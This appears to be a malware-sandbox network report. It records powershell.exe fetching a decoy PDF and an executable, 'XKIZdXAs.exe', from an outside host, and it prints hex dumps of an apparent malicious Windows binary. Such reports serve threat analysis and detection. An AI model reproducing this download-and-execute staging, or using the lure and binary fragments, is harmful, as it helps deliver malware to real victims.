                                                                        2024-12-27 08:05:18 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                        Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                        Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                        Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                        Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                        Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                        Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                        Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                        2024-12-27 08:05:18 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                        Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.849709147.45.49.1554437508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-27 08:05:22 UTC92OUTGET /Project_Information.pdf HTTP/1.1
                                                                        Host: tiffany-careers.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-27 08:05:23 UTC428INHTTP/1.1 200 OK
                                                                        etag: "5d662-676a8e3a-23c54;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:34:34 GMT
                                                                        content-type: application/pdf
                                                                        content-length: 382562
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:22 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 25 50 44 46 2d 31 2e 35 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 31 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 37 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 36 20 30 20 52 20 31 38 20 30 20 52 20 32 30 20 30 20 52 20 32 34 20 30 20 52 20 32 36 20 30 20 52 20 32 38 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 32 20 30 20
                                                                        Data Ascii: %PDF-1.5%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>>>endobj2 0 obj<</Type/Pages/Count 7/Kids[ 3 0 R 6 0 R 18 0 R 20 0 R 24 0 R 26 0 R 28 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 09 bc ff 00 ae 12 7f e8 26 be d8 f3 0f 96 7c 41 ff 00 21 ab 8f ad 65 d6 a7 88 3f e4 35 71 f5 ac ba 62 3d 03 e1 3f fc 8d 10 7f bf fd 0d 7d 0b 5f 3d 7c 27 ff 00 91 a2 0f f7 ff 00 a1 af a1 68 00 a2 8a 29 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 2a 95 e3 66 40 be 82 ae d6 7d d7 fa f3 40 10 d1 45 14 c0 28 a2 8a 00 28 a2 8a 00 bf 6a db a1 00 f6 a8 ef 24 e0 20 3f 5a 5b 2f b8
                                                                        Data Ascii: &|A!e?5qb=?}_=|'h)((((((((((((((((((((((((((((((((((((*f@}@E((j$ ?Z[/
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 28 a2 8a 00 28 a2 ac d9 db 19 e6 c9 1f 22 f5 34 0a 52 51 57 66 9d 8c 66 3b 55 04 73 de aa ea 90 9c ac a0 7d 6b 48 70 30 29 b2 c6 b2 c6 c8 c3 83 54 79 f1 a9 69 f3 1c ed 15 2d c4 0d 04 a5 58 71 d8 d4 55 27 a0 9a 6a e8 28 a2 8a 06 14 51 45 00 6c 69 9f f1 e8 3f de 35 83 e2 fb 02 c2 3b d4 19 c7 ca d8 ec 2b 7b 4c ff 00 8f 31 fe f1 ab 17 36 e9 75 6e f0 c8 32 ae 30 6a 91 e6 d4 f8 d9 e5 94 55 ed 57 4c 97 4c bb 68 d8 1f 2c 9f 91 bd 6a 8d 51 21 45 14 50 01 45 14 50 07 6f e1 1f f9 05 bf fb f5 c8 ea 20 8d 46 70 47 f1 57 5d e1 1f f9 06 3f fb f5 85 e2 6b 26 b6 d5 1a 50 3f 77 28 ca 9a 42 31 68 a2 8a 63 0a 28 a2 80 0a 28 a7 24 6d 2c 8b 12 0c b3 9c 01 40 1d e7 85 94 ae 85 18 61 fc 46 b9 ff 00 12 5b 98 35 56 60 38 90 67 35 d8 69 d6 c2 d2 c6 28 71 c8 5e 7e b5 53 5d d3 3f b4
                                                                        Data Ascii: (("4RQWff;Us}kHp0)Tyi-XqU'j(QEli?5;+{L16un20jUWLLh,jQ!EPEPo FpGW]?k&P?w(B1hc(($m,@aF[5V`8g5i(q^~S]?
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 51 bb 4d b2 06 1d 0d 5e a6 49 18 91 0a 9f c2 80 33 28 a7 3a 34 6d b5 85 36 98 05 14 51 40 05 00 12 70 3b 9a 2a dd b4 04 1d ec 3e 82 80 2c 22 ec 8c 2f a0 ac d7 fb ed f5 ad 5e d5 94 ff 00 7d be b4 00 94 51 45 00 14 51 45 00 14 51 45 00 68 db 7f a8 5a c3 9f fe 3e 65 ff 00 78 d6 e5 bf fa 95 ac 39 ff 00 e3 e6 4f f7 8d 4b 3a 70 db b2 3a 28 a2 91 d8 14 51 45 00 14 76 a2 8e d4 01 b7 63 ff 00 1e 6b 58 f3 02 26 60 7d 6b 62 c3 fe 3d 56 a9 6a 36 e5 25 f3 40 f9 5b af d6 9f 43 96 94 92 a8 d3 28 d1 45 14 8e a0 a2 8a 28 00 a2 8a 92 08 4c f2 aa 0e 99 e4 d0 26 d2 57 26
                                                                        Data Ascii: Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@QM^I3(:4m6Q@p;*>,"/^}QEQEQEhZ>ex9OK:p:(QEvckX&`}kb=Vj6%@[C(E(L&W&
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: e3 ae 07 7f 4a e3 3e 2b 69 9f db fe 0c b4 d6 ed 62 7c da e2 52 19 70 c2 37 1c e4 7b 71 5d 09 ea 73 bd 8e bd 08 f3 5b 9e 09 c8 f7 ad 18 8f 15 c0 f8 2f 5b 97 c4 3e 1d b3 74 ba 58 e7 b4 c4 37 6b b0 33 36 3e e9 c9 e8 08 ef 8a ee 21 7e 2a 5a b3 29 6c 58 ba b5 8a fa d2 4b 69 86 51 c6 3e 9e f5 e7 af 6e fa 66 ac 6d e5 e7 6b 6d 27 fb ca 7f fa c6 bd 15 5e bc e7 c7 de 22 d3 f4 7d 7e 18 ae ad 6e 64 91 e0 0e 1a 27 50 3e f1 1d fe 95 e4 e6 58 09 62 52 95 25 ef 2f c8 ef c1 62 d5 16 e3 37 ee b0 92 17 b9 d4 23 b2 88 64 ae 22 51 e9 eb fa e4 d7 7f a7 d8 c5 a7 59 25 bc 43 80 32 c7 fb c7 b9 af 34 f0 8f 8b 34 dd 57 c5 96 d6 f0 d9 dd ac d2 ef 21 e4 75 2a 3e 52 4f 41 5e a2 cd 4b 2d cb e5 87 72 9d 55 ef 3f c8 78 cc 5c 6b 28 c6 9b d1 7e 63 25 3c 56 74 ee aa 4b 33 61 57 2c c4 f6 02
                                                                        Data Ascii: J>+ib|Rp7{q]s[/[>tX7k36>!~*Z)lXKiQ>nfmkm'^"}~nd'P>XbR%/b7#d"QY%C244W!u*>ROA^K-rU?x\k(~c%<VtK3aW,
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 3c 4d dd a4 78 58 ec 8f 92 2e 74 35 f2 3d 56 8a 6a 3a c8 8a e8 c1 95 86 41 07 a8 a7 57 59 f3 8f 40 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 af 33 f8 8f aa c9 25 fc 5a 62 31 11 46 bb dc 03 f7 98 f4 fc 87 f3 af 4c af 22 f8 81 03 c5 e2 99 64 61 f2 cb 1a b2 fe 03 1f d2 b0 c4 36 a1 a1 eb e4 90 8c b1 6b 9b a2 67 2d 45 14 57 9e 7d a8 57 a5 7c 37 d5 64 9a da e3 4d 95 89 10 e1 e2 c9 e8 0f 51 f9 ff 00 3a f3 5a ee 3e 1a 42 ed aa 5e 4c 3e e2 44 14 fd 49 ff 00 eb 56 d4 1b 53 47 99 9c 42 32 c2 49 cb a1 e9 d4 51 45 7a 27 c3 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 15 4a f7 57
                                                                        Data Ascii: <MxX.t5=Vj:AWY@(((((((((((3%Zb1FL"da6kg-EW}W|7dMQ:Z>B^L>DIVSGB2IQEz'Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@JW
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 7e 43 63 df 8a e6 c4 42 52 b5 8f 7b 25 c5 d1 c3 f3 aa ae d7 b1 c3 51 5d af fc 2b 5d 53 fe 7e ed 7f f1 ef f0 a3 fe 15 ae a9 ff 00 3f 76 bf f8 f7 f8 57 37 b0 9f 63 de fe d5 c2 7f 39 89 e1 3f f9 1a b4 ff 00 fa eb fd 0d 7b 67 6a e0 bc 3d e0 2b 9d 37 57 8a f6 ee e6 36 58 4e e4 58 b3 c9 f7 c8 e9 5d ed 75 e1 e1 28 c6 cc f9 ac e7 13 4e bd 65 2a 6e e9 20 af 27 f8 8d ff 00 23 2c 7f f5 ec bf fa 13 57 ac 57 21 e2 cf 07 4b af 5d c5 79 6b 70 91 ca a9 e5 b2 c9 9c 11 92 47 4f ad 55 68 b9 42 c8 c7 2a af 0a 18 95 3a 8e c8 f2 8a 2b b5 ff 00 85 6b aa 7f cf dd af fe 3d fe 14 7f c2 b5 d5 3f e7 ee d7 ff 00 1e ff 00 0a e2 f6 13 ec 7d 5f f6 ae 13 f9 ce 2a bd a7 c1 df f2 29 d8 7f b8 7f 99 ae 2c 7c 35 d4 f2 33 77 6d 8e ff 00 7b fc 2b d1 34 9d 3d 74 ad 2e de c9 1c ba c2 bb 77 1e e6
                                                                        Data Ascii: ~CcBR{%Q]+]S~?vW7c9?{gj=+7W6XNX]u(Ne*n '#,WW!K]ykpGOUhB*:+k=?}_*),|53wm{+4=t.w
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: fb 03 58 9c 41 1a b9 6b 69 dc fc a3 3d 50 fa 73 93 9f 7a f6 09 75 9d 32 1b 6f b4 c9 a8 da 2c 00 67 cc 33 2e df cf 35 e6 be 23 f8 27 65 7d 72 f7 3a 25 e8 b2 2e 72 6d e5 5d d1 8f a1 1c 81 ed cd 61 d9 fc 09 d4 da 61 f6 ed 5e ce 38 b3 cf 90 ac ec 7f 30 28 19 47 e2 7f 8c 57 c5 d3 7d 93 47 57 97 4b d3 bf 7b 2c e0 60 3b 12 17 3f 41 9c 0f ad 74 ff 00 01 ff 00 e4 11 ac 0f fa 78 4f fd 04 d7 49 2f c3 5d 36 0f 05 5e 78 7f 4b 6f 22 4b ad a6 4b a9 57 7b b9 04 1e 7a 7e 55 27 c3 ff 00 04 4d e0 ab 6b e8 65 bf 4b bf b4 ba b0 2b 1e cd b8 07 dc d0 23 b3 a2 8a 28 03 33 c4 56 cd 79 e1 8d 5a d5 06 5a 6b 39 a3 50 3d 4a 11 5f 3c fc 2e d6 6d 74 2f 1c 41 35 f4 a2 18 25 8d e0 69 1b 80 84 f4 cf e2 05 7d 33 5e 49 e2 af 82 e9 a9 6a 33 5f 68 97 b1 5a 99 98 bb db ce a7 60 63 fd d2 3a 0f
                                                                        Data Ascii: XAki=Pszu2o,g3.5#'e}r:%.rm]aa^80(GW}GWK{,`;?AtxOI/]6^xKo"KKW{z~U'MkeK+#(3VyZZk9P=J_<.mt/A5%i}3^Ij3_hZ`c:
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: de ee 2b 9e a2 80 3d 52 09 e3 b9 85 65 89 83 23 0c 82 29 66 62 90 bb 0e a1 72 2b 8a f0 c6 aa d6 d7 62 d2 43 fb a9 0f cb 9e c6 bb 3b 8f f8 f6 93 fd d3 48 47 98 dd 3b 4d 77 2b c8 c5 98 b1 e4 d4 38 1e 95 24 df eb e4 ff 00 78 d3 29 8c 4c 0f 4a 30 3d 29 68 a0 04 c0 f4 a3 03 d2 96 8a 00 15 8c 4c 1d 0e 19 4e 41 15 e9 d6 12 34 9a 6c 12 39 cb 34 60 93 f8 57 98 37 dd 3f 4a f4 dd 37 fe 41 36 ff 00 f5 c8 7f 2a 4c 3a 99 12 b1 79 58 b7 27 34 dc 53 9f ef b7 d6 9b 50 7a 71 d8 31 46 28 a2 81 86 28 c5 14 50 00 38 39 1e b5 d0 5b 31 7b 74 63 d4 8a e7 eb 7a d4 e2 d1 09 f4 a6 8e 6c 4a d1 11 de 5e 7d 9d 76 af 2e 7f 4a c7 79 1e 53 97 62 69 d3 c8 64 9d 98 9e fc 54 74 1a 52 a6 a2 83 8a 31 45 14 8d 44 c0 a7 a4 8f 19 ca 31 1f 4a 6d 14 09 ab 9b 36 57 82 71 b1 f8 71 fa d5 ca e7 62 73
                                                                        Data Ascii: +=Re#)fbr+bC;HG;Mw+8$x)LJ0=)hLNA4l94`W7?J7A6*L:yX'4SPzq1F((P89[1{tczlJ^}v.JySbidTtR1ED1Jm6Wqqbs
                                                                        2024-12-27 08:05:23 UTC16384INData Raw: 5a d3 c6 61 c7 b5 00 66 51 41 e0 e0 d1 40 05 14 51 40 05 14 51 40 05 6a af dd 5f a5 65 56 aa fd d5 fa 50 02 d1 45 14 80 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a
                                                                        Data Ascii: ZafQA@Q@Q@j_eVPE((((((((((((((((((((((((((((((((((((((((((((((((((((((


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.849711147.45.49.1554437508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-27 08:05:26 UTC57OUTGET /XKIZdXAs.exe HTTP/1.1
                                                                        Host: tiffany-careers.com
                                                                        2024-12-27 08:05:26 UTC439INHTTP/1.1 200 OK
                                                                        etag: "108a00-676a8a80-23c52;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:18:40 GMT
                                                                        content-type: application/x-executable
                                                                        content-length: 1083904
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:26 GMT
                                                                        server: LiteSpeed
